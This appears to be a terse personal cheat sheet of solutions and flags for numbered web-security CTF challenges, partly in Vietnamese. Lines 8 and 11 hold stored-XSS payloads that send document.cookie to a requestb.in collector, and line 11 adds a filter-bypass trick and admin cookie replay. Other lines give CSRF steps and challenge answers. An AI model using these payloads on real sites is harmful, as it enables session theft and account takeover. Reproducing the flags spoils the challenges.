1: del "disable">>> 	HTMLCantStopYou

2: f12>>login.js:
--user: 4dm1n --pass:	sh.org==flag

3: Ctrl+U>>> 	123456azerty

4: Ctrl+U>login.js>>	HIDDEN

5: unescape(pass)>>	cpasbiendurpassword

6: eval()>>> String.fromcharcode()>>	hDufjdki156

7: remove the last ()>> .toString()>>>	toto123lol

8: <script>document.write("<img src='https://requestb.in/1n2gpxz1?inspect="+document.cookie+"'></img>");</script>

9: copy: "\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x3	0\x37\x2c\x34\x39\x2c\x35\x30">> console >> String.fromcharcode()>>>	786OsErtk12

10: after register and login copy and paste payload_c22 code into message form<contact>>>private>>>Good job dude, flag is : 	Csrf_Fr33style-L3v3l1! 

11: XSS-Stored 2: 
	Dùng edit this cookie: Edit cookie status = admin"><script> document.write('<img src="https://requestb.in/y7nuudy7?inspect' + document.cookie + '" />');</script> (với dấu + chuyển thành %2b để bypass filter)
	Qua request bin nhận được ADMIN_COOKIE>>add vào edit cookie & send 1 mess>>>>
	flag: E5HKEGyCXQVsYaehaqeJs0AfV	

12: same with 10, but we need to pybass token to submit {c23.html} >>> Byp4ss_CSRF_T0k3n-w1th-XSS 